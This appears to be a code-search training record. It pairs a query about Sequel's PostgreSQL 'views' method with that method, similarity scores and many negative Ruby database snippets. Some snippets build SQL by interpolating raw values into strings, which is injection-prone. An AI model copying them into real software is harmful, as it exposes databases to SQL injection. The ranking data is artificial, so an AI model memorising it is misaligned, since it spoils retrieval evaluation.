"def _insert_select_raw(ds)\n if use_prepared_statements_for?(:insert_select)\n if ps = model.send(:prepared_insert_select, @values.keys)\n _set_prepared_statement_server(ps).call(@values)\n end\n else\n super\n end\n end",
"def select_sql\n return super unless o = @opts[:offset]\n l = @opts[:limit]\n order = @opts[:order]\n dsa1 = dataset_alias(1)\n dsa2 = dataset_alias(2)\n rn = row_number_column\n irn = Sequel::SQL::Identifier.new(rn).qualify(dsa2)\n subselect_sql(unlimited.\n from_self(:alias=>dsa1).\n select_more(Sequel::SQL::QualifiedIdentifier.new(dsa1, WILDCARD),\n Sequel::SQL::WindowFunction.new(SQL::Function.new(:ROW_NUMBER), Sequel::SQL::Window.new(:order=>order)).as(rn)).\n from_self(:alias=>dsa2).\n select(Sequel::SQL::QualifiedIdentifier.new(dsa2, WILDCARD)).\n where(l ? ((irn > o) & (irn <= l + o)) : (irn > o))) # Leave off limit in case of limit(nil, offset)\n end",
"def select_sql\n return super unless l = @opts[:limit]\n o = @opts[:offset] || 0\n order = @opts[:order]\n dsa1 = dataset_alias(1)\n dsa2 = dataset_alias(2)\n rn = row_number_column\n irn = Sequel::SQL::Identifier.new(rn).qualify(dsa2)\n subselect_sql(unlimited.\n from_self(:alias=>dsa1).\n select_more(Sequel::SQL::QualifiedIdentifier.new(dsa1, WILDCARD),\n Sequel::SQL::WindowFunction.new(SQL::Function.new(:ROW_NUMBER), Sequel::SQL::Window.new(:order=>order)).as(rn)).\n from_self(:alias=>dsa2).\n select(Sequel::SQL::QualifiedIdentifier.new(dsa2, WILDCARD)).\n where((irn > o) & (irn <= l + o)))\n end",
"def values value_type = :formatted_value\n return @values unless @values.nil?\n\n @values = []\n while @rowset.next do\n @values << 1.upto(self.columns.size).map do |i|\n @rowset.getString i\n end\n end\n\n @values\n end",
"def getDBValue(connection, query, id1, *id2)\r\n dbi_query = connection.prepare(query)\r\n dbi_query.execute(id1, *id2)\r\n #fetch the result\r\n return dbi_query.fetch\r\nend",
"def prepared_insert(cols)\n cached_prepared_statement(:insert, prepared_columns(cols)){prepare_statement(dataset, :insert, prepared_statement_key_hash(cols))}\n end",
"def create(values)\n a = new(values)\n a.insert\n a\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\nend",
"def execute2( sql, *bind_vars )\n stmt = prepare( sql )\n stmt.bind_params( *bind_vars )\n stmt.execute do |result|\n if block_given?\n yield result.columns\n result.each { |row| yield row }\n else\n return result.inject( [ result.columns ] ) { |arr,row| arr << row; arr }\n end\n end\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def values_for_insert\n values = []\n self.class.column_names.each do |col_name|\n values << \"'#{send(col_name)}'\" unless send(col_name).nil?\n end\n values.join(\", \")\n end",
"def compound_dataset_sql_append(sql, ds)\n sql << '('\n super\n sql << ')'\n end",
"def value_list(arg)\n raise Error, 'argument to Sequel.value_list must be an array' unless arg.is_a?(Array)\n SQL::ValueList.new(arg)\n end",
"def add_values_rec(schema, table, t, query)\n if t.parent == nil\n t.data['values'] = exec(query)\n else\n t.parent.data['values'].each_with_index { |v, i|\n where = \"WHERE\"\n unless t.parent.foreign_keys.size == 0\n t.parent.foreign_keys.each { |x|\n if x['foreign_table_name'] == t.table_name\n foreign_col = x['foreign_column_name']\n col = x['column_name']\n parent_val = t.parent.data['values'][i][col]\n where = \"#{where} #{foreign_col} = '#{parent_val}'\"\n end\n }\n end\n query = \"SELECT * FROM #{schema}.#{table} #{where} LIMIT 1\";\n if t.data['values'].nil?\n t.data['values'] = Array.new\n end\n t.data['values'] << exec(query)[0]\n }\n end\n\n t.depends.each { |n|\n add_values_rec(schema, n.table_name, n, query)\n }\nend",
"def update_sql(values=OPTS)\n case values\n when LiteralString\n super\n when String\n super(LiteralString.new(values))\n else\n super\n end\n end",
"def merge_insert(*values, &block)\n h = {:type=>:insert, :values=>values}\n if override = @opts[:override]\n h[:override] = insert_override_sql(String.new)\n end\n _merge_when(h, &block)\n end",
"def insert_by_data data, table\n sql = \"insert into #{table} \"\n case data\n when Array\n data.each do |d|\n insert_by_data(d, table)\n end\n when Hash\n columns = data.keys.to_s.gsub('[','(').gsub(']',')').gsub('\"','')\n values = data.values.to_s.gsub('[','(').gsub(']',')').gsub('nil','NULL')\n sql = sql + columns + \" values \" + values\n query(sql)\n end\n end",
"def _insert_select_raw(ds)\n ds.insert_select(_insert_values)\n end",
"def _insert_select_raw(ds)\n ds.insert_select(_insert_values)\n end",
"def to_sql(options = {})\n sql = \"SET #{variable.to_sql(options)}\"\n sql << \" TO #{value.to_sql(options)}\"\n sql\n end",
"def prepared_sql\n case prepared_type\n when :select, :all, :each\n # Most common scenario, so listed first.\n select_sql\n when :first\n clone(:limit=>1).select_sql\n when :insert_select\n insert_select_sql(*prepared_modify_values)\n when :insert, :insert_pk\n insert_sql(*prepared_modify_values)\n when :update\n update_sql(*prepared_modify_values)\n when :delete\n delete_sql\n else\n select_sql\n end\n end",
"def sql_literal_append(ds, sql)\n sql << 'ROW'\n ds.literal_append(sql, to_a)\n if db_type\n sql << '::'\n ds.quote_schema_table_append(sql, db_type)\n end\n end"
] |
[
"0.6753085",
"0.62763065",
"0.6110033",
"0.60504055",
"0.60172516",
"0.6014192",
"0.6014192",
"0.6014192",
"0.59369415",
"0.59227353",
"0.5892935",
"0.5834878",
"0.5817698",
"0.58152235",
"0.57881755",
"0.57512873",
"0.5743603",
"0.56180286",
"0.56150466",
"0.5567219",
"0.55650127",
"0.5553461",
"0.5533461",
"0.5527519",
"0.55056405",
"0.54960066",
"0.54938126",
"0.5485569",
"0.54644233",
"0.5447037",
"0.54394484",
"0.5429797",
"0.541834",
"0.5418245",
"0.540766",
"0.53971833",
"0.5383632",
"0.5346307",
"0.53317356",
"0.53302777",
"0.53206563",
"0.5280352",
"0.52710575",
"0.52602595",
"0.5260173",
"0.52579457",
"0.5251952",
"0.52511376",
"0.52370524",
"0.5227489",
"0.52156657",
"0.52087873",
"0.52086884",
"0.5207923",
"0.5203451",
"0.5189627",
"0.5158768",
"0.51400995",
"0.51400995",
"0.51288205",
"0.51002073",
"0.50877833",
"0.5082867",
"0.50802845",
"0.507322",
"0.50672406",
"0.50647306",
"0.50642806",
"0.50601214",
"0.50541866",
"0.50522757",
"0.5042895",
"0.50357985",
"0.5022594",
"0.5022019",
"0.50089246",
"0.50061285",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.4989774",
"0.49851337",
"0.49770308",
"0.49716088",
"0.49702686",
"0.4964581",
"0.49619704",
"0.4956249",
"0.4956249",
"0.49449632",
"0.49436006",
"0.49421656"
] |
0.5404321
|
35
|
Array of symbols specifying view names in the current database.

Options:
:materialized :: Return materialized views
:qualify :: Return the views as Sequel::SQL::QualifiedIdentifier instances, using the schema the view is located in as the qualifier.
:schema :: The schema to search
:server :: The server to use
|
def views(opts=OPTS)
relkind = opts[:materialized] ? 'm' : 'v'
pg_class_relname(relkind, opts)
end
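Illustrative calls covering the documented options, assuming DB is a Sequel PostgreSQL Database (the view names shown are hypothetical):

  DB.views                          # => [:active_users, :order_totals]
  DB.views(:materialized=>true)     # materialized views only (relkind 'm' instead of 'v')
  DB.views(:qualify=>true)          # returns Sequel::SQL::QualifiedIdentifier instances
  DB.views(:schema=>:reporting)     # restrict the lookup to the given schema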
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def views(name = nil)\n select_values(\"SELECT table_name FROM information_schema.views\", name)\n end",
"def get_views\n connect_db.fetch(\"SELECT RDB$RELATION_NAME, RDB$VIEW_SOURCE FROM RDB$RELATIONS WHERE RDB$VIEW_BLR IS NOT NULL AND (RDB$SYSTEM_FLAG IS NULL OR RDB$SYSTEM_FLAG = 0)\")\n end",
"def view_names\n self['views'].keys\n end",
"def create_view_prefix_sql(name, options)\n sql = create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}#{'TEMPORARY 'if options[:temp]}#{'RECURSIVE ' if options[:recursive]}#{'MATERIALIZED ' if options[:materialized]}VIEW #{quote_schema_table(name)}\", options[:columns] || options[:recursive])\n\n if options[:security_invoker]\n sql += \" WITH (security_invoker)\"\n end\n\n if tablespace = options[:tablespace]\n sql += \" TABLESPACE #{quote_identifier(tablespace)}\"\n end\n\n sql\n end",
"def views(opts=OPTS, &block)\n tables_or_views('VIEW', opts, &block)\n end",
"def quote_table_or_view(name, options)\n schema = options[:schema]\n if schema\n \"\\\"#{schema}\\\".\\\"#{name}\\\"\"\n else\n \"\\\"#{name}\\\"\"\n end\n end",
"def views\n Views.new(connection).all\n end",
"def create_view_prefix_sql(name, options)\n create_view_sql_append_columns(\"CREATE #{'OR REPLACE 'if options[:replace]}VIEW #{quote_schema_table(name)}\", options[:columns])\n end",
"def materialized_views(name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; [] end",
"def do_query_view(view_name, view_options)\n database.view \"#{self.name.underscore}/#{view_name}\", view_options\n end",
"def views(stream)\n # Don't create \"system\" views.\n view_names = PgSaurus::Tools.views\n view_names.each do |options|\n write_view_definition(stream,\n options[\"table_schema\"],\n options[\"table_name\"],\n options[\"view_definition\"])\n end\n stream << \"\\n\"\n end",
"def get_views()\n gen_config.views.map(&:name)\n end",
"def view_names\n expr.split %r{[()]}\n end",
"def all\n views_from_mysql.map(&method(:to_scenic_view))\n end",
"def view_select_statement(view, name=nil)\n row = execute(\"SELECT VIEW_DEFINITION FROM SYSIBM.VIEWS WHERE TABLE_NAME = '#{view}'\", name).each do |row|\n return row[0]\n end\n raise \"No view called #{view} found\"\n end",
"def view(name)\n new_view = view_old(name)\n new_view.table_name = name\n new_view\n end",
"def get_schema schema_name, view, options = {}\n schema_view = Google::Cloud::PubSub::V1::SchemaView.const_get view.to_s.upcase\n schemas.get_schema name: schema_path(schema_name, options),\n view: schema_view\n end",
"def view(options = {})\n\t \tget_records('-view', {}, options)\n\t end",
"def view(ddoc,view,*opts)\n q = \"#{database}/_design/#{ddoc}/_view/#{view}\"\n q << build_query_string(opts.first,\"view\") if opts && opts.any? && opts.first.is_a?(Hash)\n\n @conn.query({url_path: q, method: :get})\n end",
"def views\n @views ||= Ken::Collection.new(types.map { |type| Ken::View.new(self, type) })\n end",
"def gen_view_uri(opts={})\n uri = format(\"/%s/_all_docs\", @dbname)\n \n msg = { \"uri\" => uri } and $stderr.puts msg.to_json if @debug\n \n return gen_uri_with_options(uri, opts)\n end",
"def scaffold_views\n #%w(list show new edit)\n %w(list show)\n end",
"def view_select_statement(view, name=nil)\n q =<<-ENDSQL\n SELECT\n SM.definition\n FROM\n sys.objects O\n JOIN\n sys.sql_modules SM ON o.object_id = SM.object_id\n WHERE\n o.type = 'V' AND o.name = '#{view}'\n ENDSQL\n \n view_def = select_value(q, name)\n \n if view_def\n return convert_statement(view_def)\n else\n raise \"No view called #{view} found\"\n end\n end",
"def create_view_sql(name, source, options)\n source = source.sql if source.is_a?(Dataset)\n sql = String.new\n sql << \"#{create_view_prefix_sql(name, options)} AS #{source}\"\n if check = options[:check]\n sql << \" WITH#{' LOCAL' if check == :local} CHECK OPTION\"\n end\n sql\n end",
"def available_views\n %w(index new edit show _list _form)\n end",
"def drop_view(*names)\n options = names.last.is_a?(Hash) ? names.pop : OPTS\n names.each do |n|\n execute_ddl(drop_view_sql(n, options))\n remove_cached_schema(n)\n end\n nil\n end",
"def view_types(for_select = true) # get the defined view type partials. e.g. views/views/list.html.erb\n fetch_array_for get_view_types, for_select\n end",
"def get_view_name(search_fields, prefix = \"find\")\n prefix + \"_by_\" + search_fields.join('_and_')\n end",
"def list_schemas view, options = {}\n schema_view = Google::Cloud::PubSub::V1::SchemaView.const_get view.to_s.upcase\n paged_enum = schemas.list_schemas parent: project_path(options),\n view: schema_view,\n page_size: options[:max],\n page_token: options[:token]\n\n paged_enum.response\n end",
"def views(name = nil)\n raise NotImplementedError, \"views is an abstract method\"\n end",
"def view_query(design_document_name, view_name, options = Options::View::DEFAULT)\n resp = @backend.document_view(@name, design_document_name, view_name, options.namespace, options.to_backend)\n ViewResult.new do |res|\n res.meta_data = ViewMetaData.new do |meta|\n meta.total_rows = resp[:meta][:total_rows]\n meta.debug_info = resp[:meta][:debug_info]\n end\n res.rows = resp[:rows].map do |entry|\n ViewRow.new do |row|\n row.id = entry[:id] if entry.key?(:id)\n row.key = JSON.parse(entry[:key])\n row.value = JSON.parse(entry[:value])\n end\n end\n end\n end",
"def viewize(functions)\n {:views => functions}\n end",
"def tables\n db_connection.select_values(\"show tables\")\n end",
"def document_index_view_types\n vals = configuration.document_index_view_types\n Blacklight::OpenStructWithHashAccess.new.tap do |s|\n view_type_options.each do |k|\n s[k] = vals.include?(k.to_s)\n end\n end\n end",
"def alter_materialized_view_schema(name, schema, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_schema => schema\n }, options).to_sql\n end",
"def materialized_view_definition(matview_name, name = nil) raise \"Internal Error: Connection adapter didn't override abstract function\"; end",
"def views\n []\n end",
"def views\n []\n end",
"def views\n []\n end",
"def views\n []\n end",
"def refresh_views\n database.views.each do |name, view|\n materialize(view)\n end\n end",
"def view_path(design, view, query_options=nil)\n design_fullname = get_design_fullname(design)\n view_options = {}\n if query_options\n # convert query args to json value\n [:key, :startkey, :endkey].each do |arg|\n view_options[arg] = query_options[arg].to_json if query_options.has_key?(arg)\n end\n\n # do not care\n [:include_docs, :update, :descending, :group, :startkey_docid, :endkey_docid, :count, :skip, :group_level].each do |arg|\n view_options[arg] = query_options[arg] if query_options.has_key?(arg)\n end\n end\n document_path(File.join(\"_view\", design_fullname, view.to_s), view_options)\n end",
"def refresh_view(name, opts=OPTS)\n run \"REFRESH MATERIALIZED VIEW#{' CONCURRENTLY' if opts[:concurrently]} #{quote_schema_table(name)}\"\n end",
"def tables view: nil\n client.list_tables(\n instance_path,\n view: view\n )\n end",
"def update_view name, type, columns, options={}\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n raise ViewNotExistException(\"View #{name} does not exist in current db\") unless view_structure\n \n columns_str = columns.is_a?(Array) ? columns.join(',') : columns\n \n select_pattern = /select (.*) from/i\n select_str = view_structure[select_pattern,1]\n\n case type\n when :add\n view_structure.gsub!(select_pattern, \"SELECT #{select_str}, #{columns_str} FROM\")\n when :remove\n select_str.gsub!(\", #{columns_str}\", '')\n view_structure.gsub!(select_pattern, \"SELECT #{select_str} FROM\")\n when :replace\n view_structure.gsub!(select_pattern, \"SELECT #{columns_str} FROM\")\n end\n\n drop_views name, options[:dependent_views] \n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end",
"def views()\n return uri(\"api/views/\")\n end",
"def tables(name = nil)\n select_rows(<<-SQL, name).map { |row| row[0] }\nSELECT name\nFROM sysobjects\nWHERE type = 'U'\nSQL\n end",
"def recreate_view name\n view_structure = ActiveRecord::Base.connection.select_value(\"select definition from pg_views where viewname='#{name}'\")\n if view_structure\n execute \"DROP VIEW IF EXISTS #{name}\"\n execute \"CREATE VIEW #{name} AS #{view_structure};\"\n end\n end",
"def show_tables\n execute('select table_name from information_schema.tables where table_schema = ?', [schema])\n end",
"def schemas\n sql = \"SELECT nspname FROM pg_namespace WHERE nspname !~ '^pg_.*'\"\n ActiveRecord::Base.connection.query(sql).flatten\n end",
"def alter_materialized_view_set_options(name, set_options, options = {})\n execute PostgreSQLMaterializedViewAlterer.new(self, name, {\n :set_options => set_options\n }, options).to_sql\n end",
"def refresh_view(view_name, options = {})\n SchemaMonkey::Middleware::Migration::RefreshView.start(connection: self, view_name: view_name, options: options) do |env|\n view_name = env.view_name\n sql = \"REFRESH MATERIALIZED VIEW #{quote_table_name(view_name)}\"\n execute sql\n end\n end",
"def tables(name = nil)\n query(<<-SQL, name).map { |row| row[0] }\n SELECT table_name\n FROM v_catalog.tables\n WHERE table_schema = 'public'\n SQL\n end",
"def schema_names\n select_value(<<-SQL, 'SCHEMA')\n SELECT nspname\n FROM pg_namespace\n WHERE nspname !~ '^pg_.*'\n AND nspname NOT IN ('information_schema')\n ORDER by nspname;\n SQL\n end",
"def get_storage_names\n select(<<-SQL.compress_lines)\n SELECT name\n FROM (SELECT * FROM sqlite_master UNION SELECT * FROM sqlite_temp_master)\n WHERE type IN('table', 'view')\n AND name NOT LIKE 'sqlite_%'\n ORDER BY name\n SQL\n end",
"def current_schemata\n extension :pg_array\n metadata_dataset.select(Sequel::function(:current_schemas, false).\n cast('varchar[]')).single_value.map(&:to_sym)\n end",
"def index\n @schemas = Schema.all\n end",
"def paths_to_view view\n replaceable_paths_to :views, \"#{view}.*\"\n end",
"def path_to_views\n @path_to_views ||= \"db/views\"\n end",
"def default_views(field_op_set)\n views = {}\n field_op_set.each do |field, op_id|\n view_name = \"by_#{field.to_s}\"\n type_of_view = OpIdToViewType[op_id] || :value_match\n views[view_name] = {:field => field.to_sym, :type_of_view => type_of_view}\n end\n views\n end",
"def enclosure_views\n client.enumerate(\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/root/DCIM/DCIM_EnclosureView\")\n end",
"def sorted_view_dependencies\n view_dep = Viewy::Models::MaterializedViewDependency.find(full_table_name)\n Viewy::DependencyManagement::ViewSorter.new.sorted_materialized_view_subset(view_names: view_dep.view_dependencies)\n end",
"def view_select_statement(view, name=nil)\n raise NotImplementedError, \"view_select_statement is an abstract method\"\n end",
"def tenant_names\n connection.execute('select datname from pg_database;').collect { |row| row['datname'] }\n end",
"def database_names\n database_info.keys\n end",
"def view_paths\n _view_paths\n end",
"def view_paths\n _view_paths\n end",
"def schema_names\n select_values(\n \"SELECT nspname FROM pg_namespace\" <<\n \" WHERE nspname !~ '^pg_.*' AND nspname NOT IN ('information_schema')\" <<\n \" ORDER by nspname;\",\n 'SCHEMA')\n end",
"def views\n self[:views] ||= Gnash.new\n end",
"def database_names\n database_info.keys\n end",
"def get_storage_names\n # This gets all the non view tables, but has to strip column 0 out of the two column response.\n select(\"SHOW FULL TABLES FROM #{options[:path][1..-1]} WHERE Table_type = 'BASE TABLE'\").map { |item| item.first }\n end",
"def all opts = {}\n self.generated_design_doc ||= default_design_doc\n unless design_doc_fresh\n refresh_design_doc\n end\n view_name = \"#{design_doc_slug}/all\"\n raw = opts.delete(:raw)\n fetch_view_with_docs(view_name, opts, raw)\n end",
"def views\n @views\n end",
"def aliases!\n @schema.aliases!\n end",
"def cd_id_table\n view_name = cd_id_table_tn\n if @cd_id_table_tn_exists.nil?\n @cd_id_table_tn_exists=true\n if !$db.table_exists?(view_name)\n $db.run(\"CREATE VIEW #{view_name} AS SELECT DISTINCT(r.canonical_document_id) FROM records r INNER JOIN records_searches br ON r.id=br.record_id INNER JOIN searches b ON br.search_id=b.id WHERE b.systematic_review_id=#{self[:id]} AND b.valid=1\n\n UNION\n\n SELECT DISTINCT r.canonical_document_id FROM searches b INNER JOIN records_searches br ON b.id=br.search_id INNER JOIN records_references rr ON br.record_id=rr.record_id INNER JOIN bib_references r ON rr.reference_id=r.id WHERE b.systematic_review_id=#{self[:id]} and r.canonical_document_id IS NOT NULL and b.valid=1 GROUP BY r.canonical_document_id\")\n end\n end\n $db[view_name.to_sym]\n end",
"def get_view_columns\n if @_view_columns.nil?\n set_default_view_columns\n end\n @_view_columns\n end",
"def origin_views\n if pq = self.parent_rmq\n pq.selected\n else\n [self.weak_view_controller.view]\n end\n end",
"def view name, query={}, &block\n unless design_doc_fresh\n refresh_design_doc\n end\n query[:raw] = true if query[:reduce] \n raw = query.delete(:raw)\n view_name = \"#{design_doc_slug}/#{name}\"\n fetch_view_with_docs(view_name, query, raw, &block)\n end",
"def show_view_option\n uri = Addressable::URI.parse(request.fullpath.split(\"?\")[0] + \"?\" + generate_next_url)\n newUri = uri.query_values\n if newUri['view'].present?\n view_option = newUri['view'].to_s\n else\n view_option = \"detailed\"\n end\n return view_option\n end",
"def view_database\n table_html = '<a href=\"/admin\"> << back to index</a>'\n table_names = ActiveRecord::Base.connection.tables.delete_if { |x| x == 'schema_migrations' }\n table_names.sort.each do |name|\n table_name = \"#{name.titleize.gsub(' ', '').singularize}\"\n table_data = eval(\"#{table_name}.all\")\n\n table_html << \"<h2 style='border-bottom: solid;background-color: lightBlue;'>#{table_name}<a href='/admin/delete_db_view_data/#{table_name}' class='btn btn-large btn-primary' style='float:right'>Delete All</a></h2>\"\n table_data.each do |row|\n table_html << \"<ul style='border: 3px dotted'>\"\n row.attributes.each do |column_name, column_data|\n table_html << \"<li>#{column_name} : #{column_data}</li>\"\n end\n table_html << \"<li><a href='/admin/delete_db_view_record/#{table_name}_#{row.id}' class='btn btn-large btn-primary' style='font-size:20px;'>[Delete Record]</a></li></ul>\"\n end\n\n end\n render :text => table_html\n end",
"def drop_view_sql(name, opts=OPTS)\n \"DROP #{'MATERIALIZED ' if opts[:materialized]}VIEW#{' IF EXISTS' if opts[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if opts[:cascade]}\"\n end",
"def table_or_view\n return unless Admin::MigrationGenerator.table_or_view_exists? table_name\n\n return :table if Admin::MigrationGenerator.table_exists? table_name\n\n :view\n end",
"def schema\n adapter.schema\n end",
"def reload! view: nil\n view ||= :SCHEMA_VIEW\n @grpc = service.get_table instance_id, name, view: view\n @loaded_views = Set[view]\n self\n end",
"def each_materialized_view(&block)\n if block_given?\n @views.each_value do |v|\n yield(v) if v.base_table\n end\n self\n else\n result = []\n @views.each_value do |v|\n result << v if v.base_table\n end\n result\n end\n end",
"def answers_by_views(options={})\n parse_answers(request(singular(id) + \"answers/views\", options))\n end",
"def fc_views\n client.enumerate(\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/root/DCIM/DCIM_FCView\")\n end",
"def tables(name = nil)\n query(<<-SQL, 'SCHEMA').map { |row| row[0] }\n SELECT tablename\n FROM pg_tables\n WHERE schemaname = ANY (ARRAY['public'])\n SQL\n end",
"def matching_records_arel(table_name)\n s = Arel::Table.new(\"#{table_name}_view\")\n arel_columns = column_names.map{ |c| Arel::Attribute.new(s, c) }\n Trade::SandboxTemplate.select('*').from(\"#{table_name}_view\").where(\n arel_columns.shift.eq(arel_columns.shift)\n )\n end",
"def columns\n [\"#{@base}.*\"]\n end",
"def drop_view_sql(name, options)\n \"DROP VIEW#{' IF EXISTS' if options[:if_exists]} #{quote_schema_table(name)}#{' CASCADE' if options[:cascade]}\"\n end",
"def view_paths; end",
"def view_paths; end",
"def view_paths; end",
"def document_index_view_type query_params=params\n view_param = query_params[:view]\n view_param ||= session[:preferred_view]\n if view_param and document_index_views.keys.include? view_param.to_sym\n view_param.to_sym\n else\n default_document_index_view_type\n end\n end",
"def build_view_paths(paths); end",
"def generate_views\n target_views = VIEWS\n file_prefix = prefix.blank? ? '' : prefix.singularize.underscore + '_'\n target_views.each do |name|\n directory name, \"app/views/#{file_prefix}#{name}\"\n end\n end",
"def databases\n arrayCommand( \"show db\", DictItemArray, RESPONSE_DATABASES_FOLLOW, RESPONSE_NO_DATABASES )\n end",
"def databases\n arrayCommand( \"show db\", DictItemArray, RESPONSE_DATABASES_FOLLOW, RESPONSE_NO_DATABASES )\n end",
"def virtual_disk_views\n client.enumerate(\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/root/DCIM/DCIM_VirtualDiskView\")\n end"
] |
[
"0.7103677",
"0.66371846",
"0.62148297",
"0.6162572",
"0.6033561",
"0.5926373",
"0.58784133",
"0.5872362",
"0.5858072",
"0.5778937",
"0.5770808",
"0.5722647",
"0.57035476",
"0.563731",
"0.55852634",
"0.55369884",
"0.5510381",
"0.5483866",
"0.5450678",
"0.54368955",
"0.53736657",
"0.5353874",
"0.5308461",
"0.52991337",
"0.5287953",
"0.52876735",
"0.52307326",
"0.522717",
"0.5204715",
"0.5194895",
"0.5192026",
"0.51676327",
"0.51561075",
"0.5129841",
"0.50958693",
"0.50958073",
"0.50867826",
"0.50867826",
"0.50867826",
"0.50867826",
"0.50781155",
"0.50778985",
"0.50714874",
"0.50608695",
"0.5014421",
"0.5011652",
"0.5008729",
"0.4999395",
"0.499787",
"0.4997494",
"0.4995671",
"0.49663284",
"0.49661928",
"0.495338",
"0.4939049",
"0.49345922",
"0.49236077",
"0.4885357",
"0.48774084",
"0.48707393",
"0.4867834",
"0.48670554",
"0.48667544",
"0.48621103",
"0.48620424",
"0.4858019",
"0.4858019",
"0.48536432",
"0.4838073",
"0.48330322",
"0.48323327",
"0.48291662",
"0.48142785",
"0.48040748",
"0.48012933",
"0.47981346",
"0.47921526",
"0.4787439",
"0.47860867",
"0.47807136",
"0.4776236",
"0.4762209",
"0.47551557",
"0.4752621",
"0.47472063",
"0.4739198",
"0.4728582",
"0.4715916",
"0.47151908",
"0.47130036",
"0.4705808",
"0.47046772",
"0.47046772",
"0.47046772",
"0.47033265",
"0.46990284",
"0.46957588",
"0.46948242",
"0.46948242",
"0.46945208"
] |
0.69248116
|
1
|
Dataset used to retrieve CHECK constraint information
|
def _check_constraints_ds
@_check_constraints_ds ||= metadata_dataset.
from{pg_constraint.as(:co)}.
left_join(Sequel[:pg_attribute].as(:att), :attrelid=>:conrelid, :attnum=>SQL::Function.new(:ANY, Sequel[:co][:conkey])).
where(:contype=>'c').
select{[co[:conname].as(:constraint), att[:attname].as(:column), pg_get_constraintdef(co[:oid]).as(:definition)]}
end
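
# Hedged usage sketch: the memoized dataset above is intended to be filtered
# per table by a consumer; this mirrors Sequel's check_constraints method,
# which appears verbatim among the related snippets below, rather than
# introducing any new API.
def check_constraints(table)
  m = output_identifier_meth

  hash = {}
  _check_constraints_ds.where_each(:conrelid=>regclass_oid(table)) do |row|
    constraint = m.call(row[:constraint])
    entry = hash[constraint] ||= {:definition=>row[:definition], :columns=>[]}
    entry[:columns] << m.call(row[:column]) if row[:column]
  end

  hash
end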
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def check_constraints(table)\n m = output_identifier_meth\n\n hash = {}\n _check_constraints_ds.where_each(:conrelid=>regclass_oid(table)) do |row|\n constraint = m.call(row[:constraint])\n entry = hash[constraint] ||= {:definition=>row[:definition], :columns=>[]}\n entry[:columns] << m.call(row[:column]) if row[:column]\n end\n \n hash\n end",
"def table_constraints(table, constraint_type, options={})\n\t \tds, result = metadata_dataset, []\n\t\t\t\toutm = sql_ident_to_sym_proc ds\n\t \tschema, table = ds.schema_and_table(table).map{|k| k.to_s.send(ds.identifier_input_method) if k} \n\t \tx_cons = schema.nil? ? 'user_cons' : 'all_cons'\n\t \t\n\t \t# Build the dataset and apply filters for introspection of constraints.\n\t\t\t\t# Also allows the caller to customize the dataset.\n\t \tds = ds.select(:c__constraint_name, :c__table_name, :c__rely, :c__status, :c__validated, :cc__column_name).\n\t\t\t\t from(:\"#{x_cons}traints___c\").\n\t\t\t\t join(:\"#{x_cons}_columns___cc\", [ [:owner,:owner], [:constraint_name,:constraint_name] ]).\n\t\t\t\t\t\t\t\twhere((options[:table_name_column]||:c__table_name)=>table, :c__constraint_type=>constraint_type).\n\t order(:table_name, :status.desc, :constraint_name, :cc__position)\n\t\t\t\tds = ds.where :c__owner => schema unless schema.nil?\n\t\t\t\tds = ds.where :c__status => (options[:enabled] ? 'ENABLED' : 'DISABLED') unless options[:enabled].nil?\n\t\t\t\tds = ds.where :c__validated => (options[:validated] ? 'VALIDATED' : 'NOT VALIDATED') unless options[:validated].nil?\n\t\t\t\tif constraint_type == 'R'\n\t ds = ds.select_more(:c__r_constraint_name, :t__table_name.as(:r_table_name)).\n\t\t\t\t\t join(:\"#{x_cons}traints___t\", [ [:owner,:c__r_owner], [:constraint_name,:c__r_constraint_name] ]).\n\t where(:t__constraint_type=>'P')\n\t\t\t\telse\n\t ds = ds.select_more(:c__index_name)\n\t\t\t\tend\n\t\t\t\t\n\t\t\t\t# Return the table constraints as a hash of subhashes, including a column list.\n\t\t\t\thash = 